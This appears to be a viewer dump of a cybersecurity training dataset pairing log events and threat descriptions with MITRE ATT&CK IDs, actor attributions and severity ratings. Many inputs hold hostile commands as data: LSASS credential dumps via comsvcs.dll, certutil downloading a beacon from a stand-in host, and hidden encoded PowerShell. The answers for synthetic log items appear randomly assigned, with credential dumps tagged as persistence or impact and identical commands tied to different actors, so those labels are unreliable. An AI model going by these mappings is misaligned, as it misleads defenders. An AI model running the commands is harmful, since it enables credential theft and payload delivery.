messages
listlengths
2
2
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2888 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.85.74.183", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0040\"], ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 525 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.20.119.241", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0001\", \"TA0009\"], \"te...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-8NA2UEPC8K)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Execution, Lateral Movement", "role": "user" }, { "c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-X9B5QWUFSO)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Execution, Command and Control", "role": "user" }, { ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1821 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.154.134.159", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0011\", \"TA0043\"], \"tec...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-BPR33XZ6BR)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2716 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.22.177.39", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0002\"], \"techniques\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-PMXFGAUHGX)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Execution", "role": "user" }, { "content": "{\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3273 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.74.203.94", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1531...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-HHH6X3G5XU)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: There are many ways to create and interact with ADSs using Windows utilities.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564\", \"T1564.004\"]}", "role": "assis...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may abuse various implementations of JavaScript to execute various behaviors.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.007\", \"T1059\"]}", "r...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Pand...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1204.001\"]}"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-XFHW08J5OG)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Privilege Escalation", "role": "user" }, { "co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 955 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-RQEO159DU5)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Discovery", "role": "user" }, { "content": "...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.156.83.4", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0003\"]...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.86.120.36", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-GD1CQU94R2)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence, Collection, Privilege Escalation", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-K3REV8YJFI)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Defense Evasion, Credential Access", "role": "user" ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: OilRig has run whoami on a victim.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Melcoz has been spread through malicious links embedded in e-mails.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.002\"]}", "role": "assistant" } ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-BYPU4OGWSC)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access, Credential Access", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"te...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 838 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confiden...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2871 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.89.64.190", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0006\", \"TA0040\"], \...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The portion of the Web shell that is on the server may be small and innocuous looking.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1505.003\", \"T1505\"]}", "role": "assistant" } ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2625 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for Process Injection against browser applications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1185\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.115.128.98", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The Windows event logs, Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-KVJ06D5U7L)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Metamorfo has used VBS code on victims’ systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-L49VA3BD8Z)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.76.160.23", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-31T139KKOU)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Collection, Discovery", "role": "user" }, { "content...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"confid...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3520 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.64.110.54", "role": "user" }, { "content": "{\"tactics\": [\"TA0003...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2695 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: WindTail has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1048.003\", \"T1048\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-VWS3EZ1Y5W)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Collection, Lateral Movement", "role": "user" },...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Is this a Windows-only threat? Which versions of Windows are targeted? Poseidon is particularly focused on the Microsoft Windows operating system family, specifically customizing the infection method for each one so as to ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.91.192.177", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-1544HSBYUN)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Initial Access", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"co...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SombRAT can run upload to decrypt and upload files from storage.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for an attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202) that may use alternate authentication material, such as password hashes, Kerberos...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.91.110.213", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.97.54.161", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.137.228.185", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0005\", \"TA0007\"], ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.122.76.157", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: QUADAGENT creates a scheduled task to maintain persistence on the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053.005\", \"T1053\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3159 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.127.213.117", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0001\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-PDGIK1RF01)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Lateral Movement, Exfiltration", "role": "user" }, {...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may stage collected data in a central location or directory prior to Exfiltration.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074\"]}", "role": "assistant...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-ZTJ634T8TP)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery, Initial Access", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "rol...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.003\", \"T1546\"]}", "role": "assist...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1270 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-H0IMYYBHEJ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-15O6ADNNJC)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Exfiltration, Defense Evasion", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3369 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Figure 5 Remote template document requesting the user to click “Enable Content” to run macro Clustering The delivery documents used in the October and November waves shared a large number of similarities, as seen in ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-S2RJHGYXMK)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"se...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.54.51.33", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.88.173.175", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techn...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Dacls can encrypt its configuration file with AES CBC.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: WarzoneRAT can obtain a list of processes on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: NotPetya contains a modified version of Mimikatz to help gather credentials that are later used for lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor executed commands and arguments that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1961 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.167.99.139", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-E87VB9XLIG)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access, Impact", "role": "user" }, { "content": "{\"severity...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2878 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 872 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.80.249.59", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0004\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-396DZCRKA4)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Impact", "role": "user" }, { "content": "{\"seve...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: SLOTHFULMEDIA has the capability to start services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.002\", \"T1569\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.100.90.44", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0006\", \"TA0011\"], \"te...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1095\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-AQEHK2WULS)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-X434B4B4N5)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Extreme\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-LAICU01MEA)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection, Discovery, Privilege Escalation", "role": "user" }, ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: UBoatRAT encrypts instructions in the payload using a simple XOR cipher.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-Q97IJJXIOO)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Extreme\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-UZEEHCHG6M)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Impact", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-ZG3Y93KGSO)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severit...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 833 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.169.232.190", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0001\"], \"techniqu...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: If the string is present, the malware executes the command RunDll32.exe", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.011\"]}", "role": "assistant" ...